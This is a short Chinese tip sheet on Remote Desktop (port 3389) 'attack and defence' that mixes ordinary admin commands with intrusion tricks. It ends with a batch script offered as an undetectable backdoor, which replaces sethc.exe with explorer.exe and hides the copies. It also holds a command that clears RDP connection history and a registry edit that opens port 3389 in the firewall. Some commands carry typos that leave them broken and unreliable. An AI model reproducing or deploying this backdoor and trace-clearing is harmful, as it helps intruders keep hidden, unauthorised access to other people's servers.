3389端口使用技巧攻防

Query:是查询的意思，为了在数据库中寻找某一特定文件、网站、记录或一系列记录，由搜索引擎或数据库送出的消息。有三条命令查看：query process、query session、query user 

Shadow:允许您远程控制另一用户的活动会话。

logoff:注销 

tsshutdn 15 /powerdown 关闭服务器命令

限止指定用户可登陆终端设置

这里可以全部删掉，然后增加我们的允许用户即可。

3389设置登陆日记记载

按上一步骤打开终端服务配置，然后进行以下设置，增加用户为everyone记录每个远程登陆操作的记录。

带框的按个人需要选择。

记录登陆3389的IP地址

data /t >>3389log.txt
time /t >>3389log.txt
netstat -n -p tcp|find ":3389">>3389log.txt
start explorer

以上命令保存为*.BAT文件，然后进行以下操作。

清除3389登录记录

reg delete  "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\" /f

取消XP&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

reg add HKLM\SYSTEM\CURRENTCONTROLSET\SERVIVES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\GLOBALLYOPENPORES\LIST /V 3389:TCP /T REG_SZ /D 3389:TCP:*ENABLED:@XPSP2RES.DLL,-22009 /F

去掉登陆限制，终端超出最在连数时可用以下命令

mstsc /v:IP:3389 /console

永不查杀的3389后门

@echo off
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo. & pause
exit